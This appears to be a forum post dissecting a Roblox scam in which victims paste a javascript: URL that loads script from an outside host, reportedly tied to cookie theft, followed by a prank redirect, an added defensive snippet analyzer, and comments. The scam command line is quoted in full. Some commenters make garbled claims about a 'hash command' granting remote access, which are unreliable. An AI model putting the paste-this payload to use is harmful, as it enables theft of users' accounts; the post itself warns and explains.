Getting revenge on a Roblox hacker
SixBeeps

(This post contains malicious JS code! Only run things if you absolutely know what it does!)

I was just browsing Roblox one day when I got the following message from a user I'd never seen before:

[image]

Already, I knew this was a scam of some sort. But I followed the YT link out of curiosity. On there, it tells you to paste something into the URL bar:

+javascript:$.get('//rblx.link:3000/1')

With my limited knowledge of JS, I managed to figure out what this code did.

  • javascript:: This stuff should be run as JS code
  • $.get: Using jQuery (I'm assuming) call an HTTP GET request
  • //rblx.link:3000/1: Some kind of link (this will be important)

So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:

// Avatar Texture Downloader script
// @WebGL3D
// 2020-06-04

// Chain of requests that allows us to get the texture hash
var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0]

// Calculate ID of CDN from hash
for (var i = 31, t = 0; t < 32; t++) i ^= hash[t].charCodeAt(0);

// Redirect to avatar texture url
location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash

On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?

Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:

[image]

If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.

+javascript:location.href="//rbxavatar--sixbeeps.repl.co"
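
A defensive check for the pattern described in this post, as an added example that is not part of the original post: it recognises a javascript: URL, lists the hosts the snippet references, and reports whether it pulls remote content into the current page or only navigates away. The function name analyzePastedSnippet and the SINKS list are assumptions made for this illustration.

```javascript
// Added example: classify text a user is told to paste into the URL bar.
// SINKS is a constructed, non-exhaustive list chosen for this illustration.
const SINKS = [
  { name: "jQuery $.get", re: /\$\.get(?:Script)?\s*\(/ },
  { name: "fetch",        re: /\bfetch\s*\(/ },
  { name: "navigation",   re: /\blocation(?:\.href)?\s*=/ },
];

function analyzePastedSnippet(text) {
  // The snippets in the post carry a leading "+" the reader is told to remove.
  const cleaned = text.trim().replace(/^\++/, "").trim();
  const isJsUrl = /^javascript:/i.test(cleaned);
  const body = isJsUrl ? cleaned.slice("javascript:".length) : cleaned;

  // Collect hosts from quoted absolute or protocol-relative URLs in the body.
  const hosts = new Set();
  const urlRe = /["'`]((?:https?:)?\/\/[^"'`\s]+)["'`]/gi;
  for (const m of body.matchAll(urlRe)) {
    try {
      // The base is a placeholder, needed only to resolve "//host/path" forms.
      hosts.add(new URL(m[1], "https://placeholder.invalid").host);
    } catch { /* ignore strings that do not parse as URLs */ }
  }

  const sinks = SINKS.filter(s => s.re.test(body)).map(s => s.name);
  // A request sink plus a remote host means remote data enters the page
  // the user is currently logged in to.
  const loadsRemote = sinks.some(n => n !== "navigation") && hosts.size > 0;

  let verdict = "not a javascript: URL";
  if (isJsUrl) {
    verdict = loadsRemote
      ? "runs in the current page and contacts a remote host"
      : sinks.includes("navigation")
        ? "navigates away from the current page"
        : "runs script in the current page";
  }
  return { isJsUrl, hosts: [...hosts], sinks, verdict };
}

// The two snippets quoted in the post.
console.log(analyzePastedSnippet("+javascript:$.get('//rblx.link:3000/1')"));
console.log(analyzePastedSnippet('+javascript:location.href="//rbxavatar--sixbeeps.repl.co"'));
```

The first snippet is reported as a request made from inside the logged-in page to rblx.link:3000, while the second only changes the page location.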

Comments
ETHANADSUNASHEA
SixBeeps
zhaq6129

@ETHANADSUNASHEA it's a rick roll, please learn meme culture

jUMPERTRIXIE

Bro what it just sends me to this https://www.youtube.com/watch?v=dQw4w9WgXcQ

SACHCHITMISHRA

it just says can't play video

KarimaKarima1

...

karenberys

It's incredible how easy it is these days to hack all items that have an internet connection. I, by the way, am also part of this Roblox aimbot ( https://guidedhacking.com/threads/lua-roblox-aimbot.17490/ ) study for personal use. A hacker is an excellent system programmer: he works at the system kernel or driver level, and the application programmers write user programs. I am constantly convinced of this. For hackers, the goal is more important than the money. And what they do is a game: if a hacker is not interested in or not comfortable doing something, he will not do it, and promises of "golden mountains" and "manna from heaven" do not work for them.

glasgonam

it's quite interesting! I have just started studying this topic, but I can already say that I really like it.

Jasperscode

dude you have no F*cking Idea what that thing does. I found a Minecraft hacked client that was proven to have a hidden backdoor and I know what it does.

Jasperscode

@Jasperscode That "scam" is using the HASH Command to give the "scammer" remote access to your computer via asking for the texture and then when the computer is getting the files it loads a virus that gives the hacker full control over anything on the computer.

SixBeeps

@Jasperscode Uhh, the hash command is supposed to keep a hash table of programs and is only on Linux. How would it be used to access things on a Windows machine? And how would that GET request to the texture call that command?

Jasperscode

@SixBeeps the hash command will work on Windows if the program is running

Jasperscode

@Jasperscode it is just less effective

SixBeeps

@Jasperscode Does it set up something like a VM? Is it some kind of weird port of the program? I don't see how a Unix command that is meant to run in a Unix ecosystem runs on something completely different like Windows.

Jasperscode

@SixBeeps More or less it makes some kind of proxy that connects the files through a VM yes

programmeruser

(sorry for necroposting) If you want to know more about this scam I found this blog post: https://petabyte.heb12.com/blog/?post=27

YPD

BEST. ROLL. EVER.

ZeeMan

Also, real haxxors could steal ur info

ZeeMan

Don't work for me

DynamicSquid

Damn, those ads really ruin it

SixBeeps

@DynamicSquid No kidding